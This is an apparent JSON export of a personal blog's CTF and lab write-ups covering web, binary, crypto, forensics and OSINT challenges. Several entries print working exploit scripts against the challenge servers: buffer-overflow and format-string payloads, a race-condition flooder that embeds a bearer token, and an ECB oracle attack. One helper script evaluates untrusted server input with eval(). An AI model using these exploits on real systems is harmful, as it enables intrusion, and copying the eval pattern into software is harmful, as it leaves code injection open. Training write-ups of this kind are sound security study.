[{"content":" Enumeration # For port enumeration, I started with rustscan and then did a detailed scan with nmap.\nRustscan result:\nnmap result for the ports:\nFor directory enumeration, I mainly use gobuster.\nGobuster directory enumeration:\nThere wasn’t anything useful I could get from here so I went back to the main site.\nThen, I tried signing up but it was for subscribed users only. Then after some messing around I found we can add another parameter in the Burp request. Also, we have to change our email and password while sending the request. These will be our creds to log in as a subscribed user.\nGetting shell # This is what we see when we log in. There is a file upload but it strips the extension and uploads it. When going to the file path, it is downloaded to the system.\nNow let’s try getting its localhost files.\nIt works!! BUT idk if it will give me anything outside /var\nSINCE this is RabbitMQ, maybe there is an admin port in the localhost of the machine?? Let’s try.\nLooks like it works.\nLooking at this result, I didn’t find anything interesting so I fuzzed the /api endpoint.\nAfter fuzzing for /api endpoints I found a /api/docs endpoint which, when uploaded, gave an interesting endpoint for a chatbot.\nAfter catching the request for the chatbot, I messed around a bit but could not find anything. After I received a hint that there was either XSS or SSTI, I realized there was no XSS so I then searched for SSTI exploit payloads. A simple payload: if I were to put some values between two curly brackets like so {{7*3}}, its result would be printed in the response. This worked, which meant I could insert a payload to gain a reverse shell. As I had no experience in exploiting SSTI, I asked the almighty ChatGPT for help. It generated me a payload which I inserted in the username parameter.\nPrivilege Escalation # With a linpeas scan I found a directory called rabbitmq. When I listed all files I found a cookie file. 
This could mean we have an exploit using this cookie??\nSearching for erlang in metasploit we do get a cookie reverse shell exploit. BUT this wasn’t working on my machine because my metasploit was recently updated, so I had to use TryHackMe attackbox. After gaining a shell of rabbitmq from metasploit, I ran a python3 reverse shell and got the shell in my machine.\nRemember how we got index.html of the admin port through localhost? We are going to forward that port to our localhost so that we can access the admin page. For this I used chisel and forwarded the port.\nThe default credentials were not working. Digging around in the official documentation of rabbitmq, we need to make the user with admin permission ourselves; then we can access the page. So, I again closed the chisel server-client I was running and created the user called admin in the rabbitmq’s shell and again ran chisel.\nIT WORKED!!\nLooking around, I found an interesting file and downloaded it.\nTurns out this contains hashes, what luck, right? NOOOO\nI spent more than 5 hours trying to crack it but no use. 
THIS WAS A RABBIT HOLE.\nAfter many trials and errors we found the password for root; the password seems to be the hash itself.\n","date":"14 December 2025","externalUrl":null,"permalink":"/writeups/tryhackme/rabbitstr/","section":"Writeups","summary":"","title":"Rabbit Store","type":"writeups"},{"content":"","date":"14 December 2025","externalUrl":null,"permalink":"/","section":"Subeg Suwal","summary":"","title":"Subeg Suwal","type":"page"},{"content":"","date":"14 December 2025","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"14 December 2025","externalUrl":null,"permalink":"/tags/tryhackme/","section":"Tags","summary":"","title":"TryHackMe","type":"tags"},{"content":" glutto.n\nView Profile → ","date":"14 December 2025","externalUrl":null,"permalink":"/writeups/tryhackme/","section":"Writeups","summary":"","title":"TryHackMe","type":"list"},{"content":"A stash of write-ups dissecting challenges, exploits, and machines—sorted by the platforms they were dropped on.\n","date":"14 December 2025","externalUrl":null,"permalink":"/writeups/","section":"Writeups","summary":"","title":"Writeups","type":"list"},{"content":"","date":"20 June 2025","externalUrl":null,"permalink":"/tags/2025/","section":"Tags","summary":"","title":"2025","type":"tags"},{"content":"","date":"20 June 2025","externalUrl":null,"permalink":"/tags/ctf/","section":"Tags","summary":"","title":"CTF","type":"tags"},{"content":" SOFTWARICA HACKFEST 2.0 # WEB # Read between the lines # The Hidden Entity # The Forgotten Key # org request\nlogged in and got this\nchecking system controls\nNinja Notes # Everything is yours # can also be done like this\nRead between the lines-2 # Solution:\nLFI with php filter\nCrypto # Happy Holi # Flag: softwarica{DEC0L0R}\nsubstitution cipher # decode me # Misc # ? Not Really. 
# Time Machine # Copy_Paste # The provided page had a function running which, on a copy event, changed every copied text to this string: DDKVPefm\nChecking this string in dcode.fr\nGot the Flag.\nGitar updated # crack me if you can # converting zip to hash\nWasn’t working on unzip so used 7z.\nWe have data from /etc/passwd and /etc/shadow. Unshadowed it and prepared to crack using --format=crypt.\nFlag: softwarica{ _defensive4}\nvirus # Flag: softwarica{ILuVYOU}\nOSINT # Follow the feed # There was a ROT 47 Ciphertext here which gave the flag.\n","date":"20 June 2025","externalUrl":null,"permalink":"/writeups/ctfs/softwarica-hackfest-2.0/","section":"Writeups","summary":"","title":"SOFTWARICA HACKFEST 2.0 2025","type":"writeups"},{"content":"","date":"14 March 2025","externalUrl":null,"permalink":"/tags/hackthebox/","section":"Tags","summary":"","title":"HackTheBox","type":"tags"},{"content":" Instant-htb # First of all add the machine IP to your /etc/hosts file.\nThe nmap scan for the machine IP showed:\nI didn’t use any options as it gives quick results but also provides fewer details.\nThere are HTTP and SSH on default ports. The HTTP server seems to be a wallet webapp. The only interaction I could get was download and contact us. I downloaded the apk and used apktool.\napktool d instant.apk\nThis revealed the application’s code and assets, including Smali files that contain the app’s logic.\nI checked “/smali/com/instantlabs/instant/adminactivities.smali” and found a JWT token and used it in burp suite. Also, I found another subdomain there, “mywalletv1.instant.htb”. Using this as host and adding the JWT token as authorization I ran burpsuite.\nThen I looked in the xml directory inside the res directory. I concatenated the “network_security_config.xml” file and found another subdomain, “swagger-ui.instant.htb”. 
Then I used this in a Burp request to view logs.\nThen I used LFI exploit\nI used LFI to get ssh key\nPrivilege Escalation # After gaining the ssh shell, I used linpeas.sh to scan the machine and found a db (instant.db).\nThere were some hashed passwords and usernames but I was unable to crack the hash. So, I checked another file I found using linpeas, “sessions-backup.dat” present in /opt/backups folder.\nIt normally contains passwords for root. It had an encrypted password.\nI used this github repo to crack it: “https://github.com/ItsWatchMakerr/SolarPuttyCracker”.\nThen I switched to root and got the root flag.\n","date":"14 March 2025","externalUrl":null,"permalink":"/writeups/hackthebox/instant-htb/","section":"Writeups","summary":"","title":"Instant","type":"writeups"},{"content":"","date":"14 March 2025","externalUrl":null,"permalink":"/tags/medium/","section":"Tags","summary":"","title":"Medium","type":"tags"},{"content":"","date":"11 March 2025","externalUrl":null,"permalink":"/tags/vishwactf/","section":"Tags","summary":"","title":"VishwaCTF","type":"tags"},{"content":" Due to some teams being disqualified, we were later ranked 11th.\nWeb Exploitation # Challenge: Flames # Flag: VishwaCTF{SQL_1nj3ct10n_C4n_Qu3ry_Your_He4rt} # This challenge must be done by spawning the instance.\nWe got stuck in a rabbit hole; it gave us results of XSS so we tried fetching it through our webhook to no avail.\nThen we stumbled across a new endpoint, /db.php\nThis error made us think there is sqli again, as our previous attempts failed. Then we tried union sqli with syntax 'UNION SELECT 1,2,3;-- -.\nThen we saw some outputs we hadn’t seen before. AND the link we get gives us access to famous love stories and our flag.\nChallenge: scan-it-to-stay-safe # Flag: VishwaCTF{Y0u_7R4c30lI7_3000_4rK} # After starting the instance we get to see a url scanner.\nSo, why not try http://localhost/flag, right? 
It didn’t work and also said max tries reached for it.\nBut this challenge was also very guessy. We tried a webhook. IT WORKED. When we checked the url of the webhook and checked the webhook site, we got our flag in one of the headers, called flag.\nChallenge: Are We Up? # Flag: VishwaCTF{Y0r4_lo7al_b4bby_A4k18aw2} # This was quite a hard challenge though it was rated as medium.\nAfter gaining the domain for this challenge we also found the availability checker of uptimer so we tried to bypass localhost:8080 while submitting the url using ngrok server.\nThen when we tried redirecting 127.0.0.1:8080/flag instead of using localhost:8008 we succeeded in retrieving the flag.\nChallenge: Forgot-h1-login # Flag: VishwaCTF{y0u_4r3_7h3_h4ck3r_numb3r_0n3_2688658} # First we try to send the reset request and redirect it to our email hook site using burpsuite.\nIn response we get the otp and also the flag in the x-ctf-secrets header\nCryptography # Challenge: Rythmic Cipher # Flag: VishwaCTF{CIPHERED_DANCE} # This challenge provided us with 2 gifs.\nThese gifs had dancing men so we thought of dancing man cipher. 
So we used a gif decompiler to split our gif into frames.\nThen we went to dcode.fr to decode this using dancing man cipher\nThis is the contents of the flag, the flag format was VishwaCTF{word1_word2}\nChallenge: Aira of the Lost Code # Flag: VishwaCTF{H4v3_y0u_7ri3d_Ar_70n3l1c0} # This challenged provided us with one .png file which contained different symbols.\nComparing these symbols in dcode.fr symbol cipher list we saw a cipher called hymnos cipher.\nAnd decoding this gave us the contents of the flag.\nFun Fact: Ar Tonelico is a game that uses this cipher.\nChallenge: Chaos # Flag: VishwaCTF{CrYpt0_cRyPT0_1g_It_1s_sOm3_7hiNg_t0_D0} # Challenge.py:\noutput.txt\nsolve.py:\nOutput:\nChallenge: Forgotten Cipher # Flag: VishwaCTF{VIC_Decoded_113510} # Along with these we were given 1 file called info.txt which contained the following:\nEncrypted Message :- 0d4ac648a2f0bee7bccf0231c35e13ba7bc93a2d8f7d9498885e3f4998 Key Evolution Formula :- K(n) = [ K(n−1) × 3 + index ] mod 25 After the hint was given we gave the description, hint and contents of the info.txt file to chat gpt which then provided us with a script which actually worked.\nSolution:\ndef rotate_right(val, r_bits, max_bits=8): \u0026#34;\u0026#34;\u0026#34;Performs a right rotation on an integer value.\u0026#34;\u0026#34;\u0026#34; return ((val \u0026gt;\u0026gt; r_bits) | (val \u0026lt;\u0026lt; (max_bits - r_bits))) \u0026amp; ((1 \u0026lt;\u0026lt; max_bits) - 1) def rotate_left(val, r_bits, max_bits=8): \u0026#34;\u0026#34;\u0026#34;Performs a left rotation on an integer value.\u0026#34;\u0026#34;\u0026#34; return ((val \u0026lt;\u0026lt; r_bits) | (val \u0026gt;\u0026gt; (max_bits - r_bits))) \u0026amp; ((1 \u0026lt;\u0026lt; max_bits) - 1) def decrypt_vic_cipher(ciphertext_hex, initial_key): \u0026#34;\u0026#34;\u0026#34; Decrypts a given ciphertext using the VIC cipher. ciphertext_hex: The hexadecimal string representing the ciphertext. initial_key: The starting key for the cipher decryption. 
\u0026#34;\u0026#34;\u0026#34; # Convert the hexadecimal string to bytes ciphertext = bytes.fromhex(ciphertext_hex) plaintext = bytearray(len(ciphertext)) key = initial_key for i, c in enumerate(ciphertext): # Update the key based on the current index key = (key * 3 + i) % 256 # Reverse the rotation based on the index if i % 2 == 0: # If index is even, reverse a left rotation with a right rotation temp = rotate_right(c, 2) else: # If index is odd, reverse a right rotation with a left rotation temp = rotate_left(c, 2) # Reverse XOR with the key to get the original plaintext byte plaintext[i] = temp ^ key # Decode the plaintext to a UTF-8 string return plaintext.decode(\u0026#39;utf-8\u0026#39;, errors=\u0026#39;replace\u0026#39;) # Example usage ciphertext_hex = \u0026#34;0d4ac648a2f0bee7bccf0231c35e13ba7bc93a2d8f7d9498885e3f4998\u0026#34; initial_key = 7 result = decrypt_vic_cipher(ciphertext_hex, initial_key) print(\u0026#34;Decrypted Flag:\u0026#34;, result) Reverse Engineering # Challenge: Safe Box # Flag: VishwaCTF{h3r3_y0u_@r3} # This challenge gave us a .zip file which contained\nContents of the zip file:\nThen, the files were transferred to our windows vm.\nWe need melon loader, unity explorer for this challenge.\nAfter it is fully loaded we get this UI:\nWe were stuck here for while trying to reverse the executable. After messing around we got the flag by opening the object explorer extending the container in the list and unchecking game object which removed the front layer, revealing the flag.\nChallenge: Hungry Friend # Flag: VishwaCTF{th3r3_4r3_5n4k35_all_4r0und} # This challenge gave us a .exe file.\nI used a vm for this. Initially it wasn’t running due to missing libraries of GCC. So I installed MinGW.\nAs for patching the binary, we used ghidra. 
The only patching it needed was changing the compared number.\nIt checked the score of the user; if it was 9999, it then called the function called SHOW_FLAG.\nSo, to patch this we change the compared value to one.\nNow, when we run it, it should give us the flag when our score is 1.\nChallenge: Phantom Rollcall # Flag: VishwaCTF{ReV_EngIn33ring_Is_Crezy} # First we intercepted the network traffic and saw Firebase API calls; we checked if it was open, then began searching.\nThen we tried whether we could run other queries in the firebase. Then we guessed so hard asf that we stumbled upon this glorious yet unknown secret.\nAfter that we used that key in this dumb enter attendance code once that’s done.\nHere you go the flag:\nSteganography # Challenge: Quadrant # Flag: VishwaCTF{aG9lMTIzNDU2c3Bhc3NhZ2U=} # This challenge provided us with a zip file containing 4 pictures named flag1,2,3,4.\nThese images contained some pieces of a qr code.\nNow we have to combine these so we can get a valid output, so we used Gimp to restore the broken qr.\nThough this was still not complete we gave it to google lens without expecting anything but we got the flag.\nChallenge: Spilled Paint Water # Flag: VishwaCTF{STROKE__N_FILL} # This challenge gave us a file called canvas.svg which on opening was just blank.\nThen we opened it in a text editor and changed width and height to 300 but no result was seen.\nThis also didn’t give any result so, as a last effort, we asked chatgpt to fix this and it gave us the fixed version.\nChallenge: Let’s Race # Flag: VishwaCTF {1_l0v3_ C0r5} # This challenge provided us with a zip file and had a note: use winrar.\nWe have an avif file and a doc.txt which had a hint.\nWe tried many things but to no avail. Then we changed it to .png and went to extract the data using stegonline. AND while keeping the value of R=1, G=2, B=3 we got the flag.\nChallenge: Echoes of Unknown # Flag: VishwaCTF{CR4CK3D_7H3_C0D3} # Uploading the file directly didn’t give anything useful. 
So we used audacity and we could see the morse code.\nWhen we crack the morse code we get our flag contents.\nDFIR # Challenge: Leaky Stream # Flag: VishwaCTF{this_is_first_part_this_second_part} # This challenge gave us a pcap file, so just to try our luck we simply did strings and grep “VishwaCTF” and guess what? We got the first part of the flag.\nAs this gave us the first part of the flag, we tried grepping “}” and scanned through the output to get the other half of the flag. AND we got another part of the flag.\nChallenge: Persist # Flag: VishwaCTF{b3l1ef_in_r3g_p0wer} # We used the RegRipper Tool for the HKCU file. https://github.com/keydet89/RegRipper3.0\nCloser inspection of report.txt:\nWe got the flag.\nOSINT # Challenge: The lecture code # Flag: VishwaCTF{cs5o_qu4ck!} # LinkedIn enumeration:\nThen checking vishwactf.com/heroes\nIn github:\nmodified crack2.py:\ndef custom_decrypt(encrypted_text): shift = 3 # Same shift used for encryption reversed_text = \u0026#34;\u0026#34;.join(chr(ord(c) - shift) for c in encrypted_text) # Reverse shift original_text = reversed_text[::-1] # Reverse back to original print(original_text) hidden_encrypted_pass = \u0026#34;$nf7xtbr8vf\u0026#34; custom_decrypt(hidden_encrypted_pass) Challenge: Stadium!! # Flag: VishwaCTF{Saling_Cricket_Stadium_Ghanche} # Checking the given image in google lens:\nChecking the X account we know the name.\nChallenge: Follow For Clues # Flag: VishwaCTF{L3t_Th3_hUn7_8Eg1n} # There was nothing on LinkedIn and Twitter so we looked on Instagram. Checking about 10 posts, we got the flag.\nChallenge : The Summit # Flag: VishwaCTF{18.51,73.89_Devendra Fadnavis} # The THeMIS tank suggested it was an event related to a military power showcase, and the people seem to be from India, and there was a date in the watermark of the image. So I googled for the military event organized on Jan 5, 2025 in India and there was an event named “Know your Army”. 
and it was organized by southern command and also got another article : https://www.punekarnews.in/pune-know-your-army-mela-2025-set-to-showcase-indian-armys-strength-and-innovation-from-january-3-5/\nThe event was organized in race course of RWITC whose coordinates was , 18.51, 73.89 and after using Chatgpt for adjusting the coordinates we got the flag: VishwaCTF{18.51,73.89_Devendra Fadnavis}\n","date":"11 March 2025","externalUrl":null,"permalink":"/writeups/ctfs/vishwactf/","section":"Writeups","summary":"","title":"VishwaCTF 2025","type":"writeups"},{"content":"","date":"3 March 2025","externalUrl":null,"permalink":"/tags/apoorvctf/","section":"Tags","summary":"","title":"ApoorvCTF","type":"tags"},{"content":" Binary Exploitation # Challenge: Kogarashi Café - The First Visit # Flag: apoorvctf{c0ffee_buff3r_sp1ll} # Solution:\nfrom pwn import * p = remote(\u0026#34;chals1.apoorvctf.xyz\u0026#34;, 3001) # Connect to challenge server brew_coffee_addr = 0x0804856b # Address of brew_coffee() ret_gadget = 0x080483d0 # Optional \u0026#34;ret\u0026#34; instruction (stack alignment) payload = b\u0026#34;A\u0026#34; * 40 # Fill buffer payload += p32(ret_gadget) # Optional ret gadget (for alignment) payload += p32(brew_coffee_addr) # Overwrite return address p.sendline(payload) # Send exploit payload print(p.recvall().decode(errors=\u0026#34;ignore\u0026#34;)) # Receive flag output p.close() Challenge: Kogarashi Café - The Secret Blend # Flag: apoorvctf{Th3_M3nu_L34ks_M0re_Than_It_Sh0uld} # Solution:\n┌──(myenv)─(glutton㉿glutton)-[~/CTF/apoorvCTF/files] └─$ nc chals1.apoorvctf.xyz 3003 Welcome to Kogarashi Café. 
Barista: \u0026#39;What will you have?\u0026#39; %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p 0x5b8481 0xfbad2288 0xffa47b7f 0x5b84b0 (nil) 0x746376726f6f7061 0x334d5f3368547b66 0x736b34334c5f756e 0x68545f6572304d5f 0x68535f74495f6e61 0x7d646c7530 0x404050 0x7f29c379f5e0 0x7025207025207025 0x2520702520702520 0x2070252070252070 now 0x746376726f6f7061 0x334d5f3368547b66 0x736b34334c5f756e 0x68545f6572304d5f 0x68535f74495f6e61 0x7d646c7530 reversing these and unhexing in cyberchef we get flag\nChallenge: Kogarashi Café - The Forbidden Recipe # Flag: apoorvctf{d3caf_is_bad_f0r_0verfl0ws} # Solution:\nfrom pwn import * # Remote connection to CTF challenge p = remote(\u0026#34;chals1.apoorvctf.xyz\u0026#34;, 3002) # Construct payload payload = b\u0026#34;A\u0026#34; * 32 # Fill buffer payload += p32(0xdecafbad) # Overwrite local_14 payload += p32(0x00c0ff33) # Overwrite local_10 # Send payload p.sendline(payload) # Interact with the shell/flag output p.interactive() Web Exploitation # Challenge: Blog-1 # Flag: apoorvctf{s1gm@_s1gm@_b0y} # This challenge only allows users to create one blog at a time so we have to make a race condition to let the server approve the request we send. 
For this challenge, we had to create 5 blogs after which gives us a reward.\nimport asyncio import aiohttp URL = \u0026#34;http://chals1.apoorvctf.xyz:5001/api/v1/blog/addBlog\u0026#34; HEADERS = { \u0026#34;Host\u0026#34;: \u0026#34;chals1.apoorvctf.xyz:5001\u0026#34;, \u0026#34;User-Agent\u0026#34;: \u0026#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\u0026#34;, \u0026#34;Accept\u0026#34;: \u0026#34;application/json, text/plain, */*\u0026#34;, \u0026#34;Accept-Language\u0026#34;: \u0026#34;en-US,en;q=0.5\u0026#34;, \u0026#34;Accept-Encoding\u0026#34;: \u0026#34;gzip, deflate, br\u0026#34;, \u0026#34;Content-Type\u0026#34;: \u0026#34;application/json\u0026#34;, \u0026#34;Authorization\u0026#34;: \u0026#34;Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2N2MzZGQwMDZlNzk5OWVlMDJjM2NhYjciLCJ1c2VybmFtZSI6InNleHkiLCJpYXQiOjE3NDA4ODkzNDksImV4cCI6MTc0MDg5Mjk0OX0.gJ9PwASH5SmXIa1rYrdQCxtYqGxyZikQcFS95YsCAEY\u0026#34;, \u0026#34;Origin\u0026#34;: \u0026#34;http://chals1.apoorvctf.xyz:5001\u0026#34;, \u0026#34;Connection\u0026#34;: \u0026#34;keep-alive\u0026#34;, \u0026#34;Referer\u0026#34;: \u0026#34;http://chals1.apoorvctf.xyz:5001/\u0026#34;, \u0026#34;Priority\u0026#34;: \u0026#34;u=0\u0026#34; } PAYLOAD = { \u0026#34;title\u0026#34;: \u0026#34;Race condition\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;success\u0026#34;, \u0026#34;visible\u0026#34;: True, \u0026#34;date\u0026#34;: \u0026#34;2025-03-01T09:47:38.723Z\u0026#34; } # Set the number of concurrent requests per wave. 
NUM_REQUESTS_PER_WAVE = 500 async def send_request(session, i, start_event): # Wait until all tasks are ready to send their request await start_event.wait() try: async with session.post(URL, json=PAYLOAD, headers=HEADERS) as response: text = await response.text() return i, response.status, text except Exception as e: return i, None, f\u0026#34;Exception: {str(e)}\u0026#34; async def run_wave(session, wave_number): # Create an event to synchronize the start of all requests in the wave. start_event = asyncio.Event() tasks = [asyncio.create_task(send_request(session, i, start_event)) for i in range(NUM_REQUESTS_PER_WAVE)] # Small delay to ensure all tasks are waiting on the event. await asyncio.sleep(0.1) # Release all tasks to send their request concurrently. start_event.set() results = await asyncio.gather(*tasks) successes = [] for i, status, text in results: # If the response text does not include the rejection message, consider it a success. if \u0026#34;Only one blog per day\u0026#34; not in text: successes.append((i, status, text)) print(f\u0026#34;Wave {wave_number}: {len(successes)} successes out of {NUM_REQUESTS_PER_WAVE} requests\u0026#34;) return successes async def main(): success_entries = [] wave = 1 async with aiohttp.ClientSession() as session: while len(success_entries) \u0026lt; 5: successes = await run_wave(session, wave) success_entries.extend(successes) print(f\u0026#34;Total successes so far: {len(success_entries)}\u0026#34;) wave += 1 # Optional delay between waves to avoid flooding the server await asyncio.sleep(0.5) print(f\u0026#34;\\n--- Achieved {len(success_entries)} successful blog posts ---\u0026#34;) for entry in success_entries: print(f\u0026#34;Request {entry[0]}: Status {entry[1]} - {entry[2]}\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: asyncio.run(main()) The reward provided a YouTube link: https://youtu.be/WePNs-G7puA?si=DOUFW9vAgUKdClxX\nWhen looking at burp request we had endpoint /api/v1/addBlog initially, after 
creating 5 blogs, we got another endpoint, /api/v2/gift. This was vague but hard to notice so we were stuck for a while. Then we got the flag after making the endpoint /api/v1/gift and sending the request through burp-suite.\nChallenge: Seo Ceo # Flag: apoorvctf{s30_1snT_0pt1onaL} # In this challenge, we found 2 files, robots.txt and sitemap.xml. We had a fake flag in robots.txt.\nIn sitemap.xml, we found a mysterious endpoint\nVisiting it we were asked a question, “Do you want the “flag” yes/no?”.\nWe were stuck on how to answer this question, until we thought of it as a parameter in url, flag=yes.\nand it worked.\nMiscellaneous # Challenge: Ghosted on the 14th # Flag: apoorctf{1m_g01ng_1n5an3} # This challenge had a pcap file which contained single http traffic.\nThis had a destination in ip 172.200.32.81:8080 normally we can’t access it, but with waybackmachine we could. There was some base64 string in source.\nCryptography # Challenge: Kowareta Cipher # Flag: apoorvctf{3cb_345y_crypt0_br34k} # Solution:\nfrom pwn import remote def get_ciphertext(io, hex_input): io.sendlineafter(\u0026#34;Enter your input:\u0026#34;, hex_input) response = io.recvline().decode(errors=\u0026#39;ignore\u0026#39;).strip() if \u0026#34;Ciphertext:\u0026#34; in response: return response.split(\u0026#34;Ciphertext: \u0026#34;)[1] else: print(\u0026#34;[-] No ciphertext received. 
Possible connection issue.\u0026#34;) return \u0026#34;\u0026#34; def detect_block_size(io): base_input = \u0026#34;41\u0026#34; # Minimal valid input (\u0026#34;A\u0026#34; in hex) base_len = len(get_ciphertext(io, base_input)) for i in range(2, 33): new_len = len(get_ciphertext(io, \u0026#34;41\u0026#34; * i)) if new_len \u0026gt; base_len: return new_len - base_len return None def confirm_ecb(io, block_size): test_input = \u0026#34;41\u0026#34; * block_size * 2 # Two identical blocks ciphertext = get_ciphertext(io, test_input) if len(ciphertext) \u0026gt;= block_size * 4: return ciphertext[:block_size * 2] == ciphertext[block_size * 2:block_size * 4] return False def recover_flag(io, block_size): flag = b\u0026#34;\u0026#34; for i in range(block_size * 2): padding = \u0026#34;41\u0026#34; * (block_size - 1 - (i % block_size)) known_block = get_ciphertext(io, padding)[:block_size * 2] found = False for b in range(256): guess = padding + flag.hex() + format(b, \u0026#39;02x\u0026#39;) attempt_cipher = get_ciphertext(io, guess) if len(attempt_cipher) \u0026gt;= block_size * 2 and attempt_cipher[:block_size * 2] == known_block: flag += bytes([b]) print(f\u0026#34;[+] Found: {flag.decode(errors=\u0026#39;ignore\u0026#39;)}\u0026#34;) found = True break if not found: print(\u0026#34;[-] Failed to match a byte. Exiting.\u0026#34;) break return flag.decode(errors=\u0026#39;ignore\u0026#39;) def main(): try: io = remote(\u0026#34;chals1.apoorvctf.xyz\u0026#34;, 4001) print(\u0026#34;[+] Connected to challenge server\u0026#34;) block_size = detect_block_size(io) if block_size: print(f\u0026#34;[+] Block size detected: {block_size}\u0026#34;) else: print(\u0026#34;[-] Failed to detect block size\u0026#34;) return if confirm_ecb(io, block_size): print(\u0026#34;[+] ECB mode confirmed!\u0026#34;) else: print(\u0026#34;[-] ECB mode NOT detected. 
Exiting.\u0026#34;) return flag = recover_flag(io, block_size) print(f\u0026#34;[+] Recovered Flag: {flag}\u0026#34;) except Exception as e: print(f\u0026#34;[!] Error: {str(e)}\u0026#34;) finally: io.close() print(\u0026#34;[*] Connection closed.\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: main() Challenge: Split Lies # Flag: apoorvctf{L4y3R3d_T2u7H} # For this challenge, we were given 2 images which we had to join with pixels.\nAfter adding we had a flag which could not be read. So we asked deepseek to make a script for this.\nSolution:\nfrom PIL import Image import numpy as np def load_image(image_path): \u0026#34;\u0026#34;\u0026#34;Load an image from the given path and convert it to a numpy array.\u0026#34;\u0026#34;\u0026#34; with Image.open(image_path) as img: return np.array(img) def add_pixel_values(img1, img2): \u0026#34;\u0026#34;\u0026#34;Add pixel values of two images.\u0026#34;\u0026#34;\u0026#34; # Clip the values to ensure they stay within the valid range (0-255) return np.clip(img1 + img2, 0, 255) def save_image(pixel_array, output_path): \u0026#34;\u0026#34;\u0026#34;Save a numpy array as an image.\u0026#34;\u0026#34;\u0026#34; img = Image.fromarray(pixel_array.astype(\u0026#39;uint8\u0026#39;)) img.save(output_path) def main(image1_path, image2_path, output_path): # Load the images img1 = load_image(image1_path) img2 = load_image(image2_path) # Ensure both images have the same dimensions if img1.shape != img2.shape: raise ValueError(\u0026#34;Both images must have the same dimensions.\u0026#34;) # Add pixel values combined_pixels = add_pixel_values(img1, img2) # Save the resulting image save_image(combined_pixels, output_path) print(f\u0026#34;Resulting image saved to {output_path}\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: # Replace with the paths to your images image1_path = \u0026#34;part1.png\u0026#34; image2_path = \u0026#34;part2.png\u0026#34; output_path = \u0026#34;output_image.png\u0026#34; main(image1_path, image2_path, 
output_path) Reverse Engineering # Challenge: Holy Rice # Flag: apoorvctf{w41t#_th15_1s_1ll3g4l!} # Solution:\nimport string # Given transformed string s2 = \u0026#34;6!!sbn*ass%84z@84c(8o_^4#_#8b0)5m_\u0026amp;j}y$vvw!h\u0026#34; # Step 1: Reverse the string (undo sub_1418) reversed_s = s2[::-1] # Step 2: Remove every extra inserted character from \u0026#34;!@#$%^\u0026amp;*()\u0026#34; (undo sub_12CB) extra_chars = \u0026#34;!@#$%^\u0026amp;*()\u0026#34; filtered_s = \u0026#34;\u0026#34;.join(c for i, c in enumerate(reversed_s) if (i % 4) != 1) # They were inserted every 3rd original char # Step 3: Reverse the character shift (undo sub_1199) charset = \u0026#34;0123456789abcdefghijklmnopqrstuvwxyz_{}\u0026#34; shifted_charset = charset[7:] + charset[:7] # Create the shifted mapping reverse_map = {shifted_charset[i]: charset[i] for i in range(len(charset))} # Reverse mapping original_s = \u0026#34;\u0026#34;.join(reverse_map[c] if c in reverse_map else c for c in filtered_s) print(\u0026#34;Recovered password:\u0026#34;, original_s) OSINT # Challenge: I Love Japan: Flag Hunt # Flag: apoorvctf{Fr13ndsh1p_G04ls} # From the previous challenge’s image we get to know the user name on github. Here we see an esolang written in Japanese. This code gave a fake flag if the user answered yes. But the commit description said printed flag helps and gave us what seems like base64.\nAfter fiddling around for a long time, I opened a ticket and got to know that the whole fake flag was a key. So we tried various ciphers to no avail. Then we asked ChatGPT, which replied it might be AES, DES and more, so we tried AES after converting the base64 string and the key to hex. 
Using KEY and IV as same in AES we got the flag while jumping around the modes in cyberchef.\n","date":"3 March 2025","externalUrl":null,"permalink":"/writeups/ctfs/apoorvctf/","section":"Writeups","summary":"","title":"ApoorvCTF 2025","type":"writeups"},{"content":"","date":"28 January 2025","externalUrl":null,"permalink":"/writeups/ctfs/","section":"Writeups","summary":"","title":"CTFs","type":"list"},{"content":" glutton2\nView Profile → ","date":"28 January 2025","externalUrl":null,"permalink":"/writeups/hackthebox/","section":"Writeups","summary":"","title":"HackTheBox","type":"list"},{"content":" SOFTWARICA HACKFEST 2025 Jan 03 Writeup by Team TkNB@Nepal # Challenge name: Happy Holi! # Category: Misc # This challenge provided an image file which had various color combination.\nIn dcode.fr we have a tool called cipher identifier. There is a graphical section which contains gravity falls color code . The colors on top left represented it. So, I matched the colors and got a text when decoded.\nThis gave me the contents of the flag. But, I had to modify this a bit and submitted the flag.\nFinal flag: softwarica{hacker_love_black_color}\nChallenge name: Math genius! # Category: Misc # This challenge was provided through a docker container which could be accessed using nc command. This challenge was based on math problems. So, we wrote a script which extracts the math expression, evaluates it and returns the answer and automatically inputs it to the challenge. 
Running this script ran the program for some time and gave us a flag.\nPython script used:\nimport socket\nimport re\n\ndef solve_question(question):\n    # Extract the math expression using regex\n    match = re.search(r\"Solve\\s+(.*)\\s+:\", question)\n    if match:\n        expression = match.group(1)\n        try:\n            # Evaluate the math expression.\n            # eval() executes whatever text the server sends, so this is only\n            # suitable against the CTF's own challenge host.\n            return str(eval(expression))\n        except Exception as e:\n            print(f\"Error evaluating expression: {expression}\")\n            return None\n    return None\n\ndef main():\n    host = \"172.100.100.23\"\n    port = 1603\n    # Connect to the server\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n        s.connect((host, port))\n        print(\"Connected to the server...\")\n        while True:\n            # Receive data from the server\n            data = s.recv(1024).decode()\n            if not data:\n                print(\"Disconnected from the server.\")\n                break\n            print(f\"Server: {data}\")\n            # Check if the data contains a question\n            if \"Solve\" in data:\n                answer = solve_question(data)\n                if answer:\n                    print(f\"Answer: {answer}\")\n                    s.sendall(answer.encode() + b'\\n')\n                else:\n                    print(\"Failed to solve the question.\")\n                    break\n            elif \"Free Flag\" in data or \"Good luck\" in data:\n                continue\n            else:\n                print(\"Unexpected server response. Exiting.\")\n                break\n\nif __name__ == \"__main__\":\n    main()\nChallenge name: E*VAL services # Category: Misc # This challenge also provided a nc command connecting to a docker. It was a pyjail challenge.\nThis was quite an easy challenge. Looking through its source we found that by providing a character we could get the flag. But when we entered the correct character it just returned correct but no flag. So, we printed the character ( print(x) ). 
